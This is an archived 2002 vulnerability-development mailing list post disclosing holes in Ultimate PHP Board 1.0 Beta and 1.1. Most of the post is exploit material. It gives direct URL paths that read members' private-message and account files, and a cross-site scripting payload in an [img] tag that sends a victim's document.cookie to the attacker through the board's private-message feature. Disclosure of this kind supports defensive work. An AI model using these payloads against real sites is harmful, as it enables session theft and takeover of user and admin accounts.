Vulnerability Development mailing list archives
Security holes : Ultimate PHP Board
From: frog frog <leseulfrog () hotmail com>
Date: 22 Apr 2002 09:05:49 -0000
Product : Ultimate PHP Board http://xcrew.host.sk Versions : 1.0 Beta 1.1 Problems : 1.0 B : - Reading of privates messages 1.1 & 1.0 B : - Access to users/admins accounts Exploits : 1.0 B : - /members/ID.pm - /members/ID.xbb 1.1 : - [img]javascript:window.open(' index.php? upb=pm&mode=send&send=yes&target_id=MY- ID&betreff=cookie&pm='+document.cookie+ '&smilies=1&use_upbcode=1&pmbox_id=VICTIME- ID&check=yes ')[/img] More details in french : http://www.ifrance.com/kitetoua/tuto/UPB.txt translated by google : http://translate.google.com/translate?u=http%3A% 2F%2Fwww.ifrance.com%2Fkitetoua%2Ftuto% 2FUPB.txt&langpair=fr%7Cen&hl=en&prev=% 2Flanguage_tools frog-m@n
Current thread:
- Security holes : Ultimate PHP Board frog frog (Apr 22)